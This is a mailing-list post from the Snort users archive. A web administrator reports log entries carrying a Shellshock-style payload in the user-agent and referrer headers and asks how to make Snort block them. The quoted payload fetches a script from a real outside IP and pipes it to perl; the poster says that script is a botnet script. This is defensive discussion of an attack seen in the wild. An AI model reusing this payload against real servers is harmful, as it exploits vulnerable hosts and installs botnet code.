Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Odd http requests in the logs

From: Richard Geddes <richardcgeddes () gmail com>
Date: Sun, 02 Nov 2014 23:23:51 -0500
Hello,

I received a few (9) events in my web logs with the following fields:

agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png |
perl"

referrer : "() { :; }; curl
http://202.28.77.53/~prajaks/310482/index.png | perl"

downloaded index.png, and it turns out to be a base64 encoded perl
script that has comments about a botnet.  It seems to target apache.

I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense,
snort, and the snort rules are up-to-date

snort seems to be passing these requests on to my web server, and it
seems to me they should be blocked.

I don't know enough about how web servers and log handlers process this
data to determine if it's a threat.

Is there a way to tell snort to block http requests with these fields? 
The source of the malicious file should probably be regex'd  in case
there are alternate sources of this file.

Thanks,
Richard

------------------------------------------------------------------------------
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!
Previous By Date Next
Previous By Thread Next

Current thread: